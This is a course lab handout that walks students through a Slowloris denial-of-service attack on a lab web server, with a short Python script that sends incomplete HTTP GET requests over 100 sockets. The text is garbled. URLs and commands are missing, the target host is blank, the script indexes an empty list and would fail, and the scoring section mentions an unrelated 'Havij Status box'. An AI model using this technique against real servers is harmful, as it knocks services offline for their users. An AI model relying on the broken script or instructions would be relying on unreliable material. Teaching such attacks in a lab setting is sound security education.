Proj 20: Slowloris (10 pts)

What you need

Viewing the Target Web Server

On your Kali Linux machine, open Firefox. Go to this URL:

The page opens, as shown below.

Viewing Server-Status

On your Kali Linux machine, open Firefox. Go to this URL:

A list of the current connections to the server appears, as shown below. The grid at the bottom shows a few letters, but mostly periods, indicating available unused connections.

Making a Slowloris Attack Script

On the Attacker Linux machine, in a Terminal window, execute this command:
In the nano window, type (or copy and paste) this script. Replace YOUR NAME with your own name.
from scapy.all import *
import socket

s = []
for i in range(100):
  t = socket.socket()
  s[i].connect(("", 80))
  s[i].send("GET / HTTP/1.1\r\nHost:\r\n")

x = raw_input("Press Enter to continue")

This script sends a series of 100 HTTP GETs, which are incomplete because they are missing the final carriage returns and line feeds d.

Preparing to Launch the Attack

In the Terminal window, type this command but don't press Enter yet.

Performing the Attack

In the Terminal window, showing this command, press Enter.
In the Firefox window, click the Refresh button.

The grid should be filling with letters, as the attack uses up all available connections.

Your screen should look like the image below on this page:

Viewing the Bottom of the Page

Scroll to the bottom of the Server-Status page.

Find the words covered by the green box in the image below.

20: Recording your Success (10 pts)

Scroll up a few lines in the Havij Status box to see the Web Server version, covered by a green box in the image above.

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
Words (redacted in the image above):

Posted 11-1-18
Last image added 11-13-18